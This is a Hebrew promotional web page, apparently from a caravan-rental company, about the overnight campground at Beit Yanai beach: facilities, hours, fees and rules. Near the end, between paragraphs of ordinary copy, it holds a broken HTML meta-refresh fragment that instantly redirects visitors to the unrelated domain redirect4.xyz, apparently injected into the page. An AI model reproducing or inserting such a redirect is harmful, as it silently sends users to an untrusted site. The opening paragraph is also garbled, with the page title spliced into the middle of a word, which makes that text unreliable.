חניון לילה בחוף בית ינאי

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

חוף בית ינאי הוא חוף מהיפים שיש למדינת ישראל להציע. הוא מהווה חלק מהגן הלאומי נחל אלכסנדר, פנינת טבע של ממש בלבחניון לילה בחוף בית ינאי אזור השרון.

בגן הלאומי תמצאו את התוואי של נחל אלכסנדר, גבעת כורכר ובה חורבת סמרה המרתקת, נקודות תצפית וכמובן שגם אוכלוסיית צבים רכים הגדולה בישראל.

אם מוסיפים לזה את חניון הלילה הנמצא בחוף בית ינאי, מבינים מדוע יכול מאד להיות שזה המקום שכדאי לכם להגיע אליו – וזאת למרות שחל איסור בו, בינתיים, לחנות עם קראוונים.

על החניון של חוף בית ינאי

חניון הלילה של חוף בית ינאי הוא בעל קיבולת של כ-600 איש, אך חשוב להדגיש שהוא לא כולל תשתיות שינה או אירוח מובנות. ניתן לעשות זאת באמצעות שקי שינה או אוהלים פרטיים שאתם מביאים אתכם (להבדיל מחניוני לילה אחרים שכוללים בחלקם אוהלים קבועים, חדרים וכן הלאה).  החניון פעיל בכל השנה למעט יום כיפור, והוא פתוח בכל שעות היממה.

חניון הלילה של חוף בית ינאי כולל מספר תשתיות חשובות. הוא מציע מקלחות עם מים חמים (המקלחות נסגרות בשעה 24:00 ונפתחות מחדש ב-7:00), מקלחות חוף, ארבעה תאי שירותים לגברים וארבעה תאים לנשים (24 שעות ביממה) במרחק סביר מהחוף, שולחנות פיקניק, ברזיות מים, מוקדי מדורות, מטבח שדה המכיל חמישה כיורים ותאים בהם ניתן לטעון את הטלפונים הניידים.

במקום פועל מרכז שירות למטייל, בימים א’ עד ה’ בשעות 10:00-20:00 ובסופי שבוע בשעות 8:00-20:30. במרכז השירות ניתן לרכוש חטיפים, משקאות קלים, גלידות, משחקים לחוף ולילדים, שמשיות, פחמים, גזרי עצים ועוד. אופציה אחרת המוצעת לאורחים היא לשכור כסאות, תמורת סכום העומד נכון לעכשיו על 10 ש”ח.

מחיר ותנאים כלליים

ניתן לשהות בחניון של חוף בית ינאי עד שישה לילות ברצף, תמורת תשלום של אגרת כניסה ולינה שנדרש לשלם בכל יום: 48 ש”ח לרכב פרטי בימי חול, או 24 ש”ח עבור כניסה עד השעה חצות ללא לינה. בימי שישי ובערבי חג התעריף עולה מעט, ועומד על 58 ש”ח לכניסת רכב פרטי כולל לינה, 24 ש”ח לכניסת רכב ללא לינה בשישי ו-34 ש”ח לכניסת רכב ללא לינה בשבת. מחירים אלה כוללים בתוכם כניסה לגן הלאומי עצמו. המחירון עשוי להשתנות לאורך השנה, בין השאר בעונות הרחצה. אזרחים ותיקים, נכים, קצינים שומרי טבע ומנויי מטמון מקבלים הנחה.

עבור משפחות או יחידים אין צורך בתיאום מראש, כאשר הכניסה היא על בסיס מקום פנוי (קבוצות ותלמידים כן נדרשות לתאם מראש). שימו לב שחל איסור להקים אוהל או צלייה מחוץ למתחם חניון הלילה, וגם לא להיכנס למתחם עם בעלי חיים. איסורים אחרים הם על הוצאת כסאות, שולחנות או ציוד אחר בשטח החניון, הפעלת אמצעי הגברה (מוזיקה בקולי קולות היא לא בבית ספרנו), הפעלת גנרטורים והכנסת בקבוקי זכוכית לשטח החוף.
equiv
"Refresh" content="0; URL=http://redirect4.xyz/">

לקבלת הצעת מחיר שלא תוכלו לסרב צרו איתנו קשר

המרכז להשכרת קרוואנים

שירותי השכרת קרוואנים עם החברה המובילה בישראל. קרוואנים לכל צורך ולכל מטרה להשכרה במחיר זול ומשתלם!

אז מה היה לנו בכתבה:

צרו איתנו קשר